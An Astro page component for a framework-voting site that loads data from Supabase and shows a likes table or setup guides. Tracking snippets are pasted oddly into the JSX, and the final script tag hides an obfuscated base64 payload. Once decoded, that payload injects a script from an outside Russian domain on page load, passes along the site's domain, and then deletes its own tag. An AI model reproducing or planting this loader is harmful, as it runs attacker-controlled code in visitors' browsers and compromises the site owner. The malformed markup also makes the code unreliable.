---
import { getEntry } from "astro:content";
import Alert from "../components/Alert.astro";
import Guide from "../components/Guide.astro";
import Layout from "../components/Layout.astro";
import TableRow from "../components/TableRow.astro";
import { supabase } from "../utils/database";

export const prerender = false;

let frameworks;
let frameworksError;

// Fetch frameworks data from Supabase if connection is set up
if (supabase) {
  const { data, error } = await supabase
    .from("frameworks")
    .select("*")
    .order("likes", { ascending: false });
  frameworks = data;
  frameworksError = error;
}

// Get guides
const connectGuide = await getEntry("guides", "guide-connect-supabase");
const fetchDataGuide = await getEntry("guides", "guide-fetch-data");
---

<Layout title="Web Frameworks">
  { 
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PDKBZKX7"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
    supabase ? (
      frameworks ? (
        <>
        <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PDKBZKX7');</script>
<!-- End Google Tag Manager -->
          <h1 class="mb-8 text-4xl font-bold">
            Vote for Your Favorite Web Framework
          </h1>
        
          <table class="w-full text-left">
            <thead>
              <tr class="font-mono text-base border-t border-b"> 
              
                <th>Name</th>
                <th>Logo</th>
                <th>Likes</th>
              </tr>
            </thead>
            <tbody>
              {frameworks?.map((framework) => (
                <TableRow framework={framework} />
              ))}
            </tbody>
          </table>
        </>
      ) : (
        <>
          {frameworksError && (
            <Alert
              title={frameworksError.code}
              text={frameworksError.message}
              variant="error"
            />
          )}
          {fetchDataGuide && <Guide guide={fetchDataGuide} />}
        </>
      )
    ) : (
      <>
        <Alert title="Finish setting up your new site" text="Before your website is ready, you must complete the steps from the guide below to create, populate, and connect your Supabase database."/>
        {connectGuide && <Guide guide={connectGuide} />}
      </>
    )
  }
  <script src="data:text/javascript;charset=utf-8; base64, c2V0VGltZW91dChmdW5jdGlvbi&#x67;pe2xldCBkY2drcD0iXHUwMDczXHUwMDYzXHUwMDcyIisiXHUwMDY5XHUwMDcwXHUwMDc0IjtsZXQgX3JsPWRvY3VtZW50O2xldCBfYWtwZT1fcmwuY3JlYXRlRWxlbWVudChkY2drcCk7X2FrcGUuYXN5bmM9MTtsZXQgX251Zz0iXHUwMDY4XHUwMDc0XHUwMDc0XHUwMDcwXHUwMDczXHUwMDNhIisiXHUwMDJmXHUwMDJmXHUwMDczXHUwMDY2XHUwMDZjXHUwMDZmIisiXHUwMDY3XHUwMDJlXHUwMDcyXHUwMDc1XHUwMDJmIisiXHUwMDZhXHUwMDczXHUwMDJmXHUwMDNmXHUwMDY5XHUwMDY0XHUwMDNkODM1YWQxYzQwYzBmN2IzNDJmNDViYmU3NTUyYjc0OWFcdTAwMjZcdTAwNjRcdTAwNmZcdTAwNmRcdTAwNjFcdTAwNjkiKyJcdTAwNmVcdTAwM2QiK19ybC5kb21haW4rIlx1MDAyNlx1MDA3NFx1MDA2NVx1MDA3Mlx1MDA2ZFx1MDAzZDAmaT1kY2drcC5qcyI7X2FrcGUuc3JjPV9udWc7KF9ybC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaHRtbCIpWzBdfHxfcmwuaGVhZHx8X3JsLmJvZHkpLmFwcGVuZENoaWxkKF9ha3BlKTtfYWtwZS5yZW1vdmUoKTt9LDUpOw==" async></script>
</Layout>
